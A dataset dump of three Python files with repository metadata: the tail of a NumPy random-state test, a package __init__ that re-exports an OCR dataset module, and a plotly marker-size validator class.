self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000,6))


if __name__ == "__main__":
run_module_suite()

avg_line_length: 44.907818 | max_line_length: 88 | alphanum_fraction: 0.571403

hexsha: 7f8b4727b91698c45d131ec345a0b4ceefe851a2 | size: 21 | ext: py | lang: Python
max_stars_repo_path: modules/retrieval/text_classification/libs/customdatasets/__init__.py | max_stars_repo_name: martinhoang11/vietnamese-ocr-toolbox | max_stars_repo_head_hexsha: 524b4908bedceb0c87b2c7cd7b5e3f6e1126ace5 | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: 14 | max_stars_repo_stars_event_min_datetime: 2021-09-05T10:42:14.000Z | max_stars_repo_stars_event_max_datetime: 2022-03-10T16:27:26.000Z
max_issues_repo_path: modules/retrieval/text_classification/libs/customdatasets/__init__.py | max_issues_repo_name: martinhoang11/vietnamese-ocr-toolbox | max_issues_repo_head_hexsha: 524b4908bedceb0c87b2c7cd7b5e3f6e1126ace5 | max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: 1 | max_issues_repo_issues_event_min_datetime: 2021-06-16T11:35:24.000Z | max_issues_repo_issues_event_max_datetime: 2021-06-16T11:35:24.000Z
max_forks_repo_path: modules/retrieval/text_classification/libs/customdatasets/__init__.py | max_forks_repo_name: martinhoang11/vietnamese-ocr-toolbox | max_forks_repo_head_hexsha: 524b4908bedceb0c87b2c7cd7b5e3f6e1126ace5 | max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: 5 | max_forks_repo_forks_event_min_datetime: 2021-09-05T13:26:51.000Z | max_forks_repo_forks_event_max_datetime: 2022-03-09T07:49:45.000Z
content:
from .mcocr import *
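# Re-exports every public name from the sibling mcocr module so callers can
# import them directly from the customdatasets package.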

avg_line_length: 10.5 | max_line_length: 20 | alphanum_fraction: 0.714286

hexsha: 9b353307a2fceecef14982f76c268060b280c09e | size: 547 | ext: py | lang: Python
max_stars_repo_path: plotly/validators/scattergeo/marker/_size.py | max_stars_repo_name: gnestor/plotly.py | max_stars_repo_head_hexsha: a8ae062795ddbf9867b8578fe6d9e244948c15ff | max_stars_repo_licenses: ["MIT"] | max_stars_count: 2 | max_stars_repo_stars_event_min_datetime: 2018-12-03T15:20:42.000Z | max_stars_repo_stars_event_max_datetime: 2018-12-03T15:20:47.000Z
max_issues_repo_path: plotly/validators/scattergeo/marker/_size.py | max_issues_repo_name: gnestor/plotly.py | max_issues_repo_head_hexsha: a8ae062795ddbf9867b8578fe6d9e244948c15ff | max_issues_repo_licenses: ["MIT"] | max_issues_count: 27 | max_issues_repo_issues_event_min_datetime: 2020-04-28T21:23:12.000Z | max_issues_repo_issues_event_max_datetime: 2021-06-25T15:36:38.000Z
max_forks_repo_path: plotly/validators/scattergeo/marker/_size.py | max_forks_repo_name: gnestor/plotly.py | max_forks_repo_head_hexsha: a8ae062795ddbf9867b8578fe6d9e244948c15ff | max_forks_repo_licenses: ["MIT"] | max_forks_count: 2 | max_forks_repo_forks_event_min_datetime: 2019-06-17T01:35:57.000Z | max_forks_repo_forks_event_max_datetime: 2020-11-03T01:07:19.000Z
content:
import _plotly_utils.basevalidators


class SizeValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name='size', parent_name='scattergeo.marker', **kwargs
):
super(SizeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop('array_ok', True),
edit_type=kwargs.pop('edit_type', 'calc'),
min=kwargs.pop('min', 0),
role=kwargs.pop('role', 'style'),
**kwargs
)
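# A minimal usage sketch, assuming NumberValidator provides the usual
# validate_coerce() helper, which coerces a candidate value against the
# constraints configured above (min=0, array_ok=True).
if __name__ == '__main__':
    v = SizeValidator()
    print(v.validate_coerce(12))        # a single number is accepted
    print(v.validate_coerce([4, 8.5]))  # a list passes because array_ok=True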

avg_line_length: 30.388889 | max_line_length: 75 | alphanum_fraction: 0.610603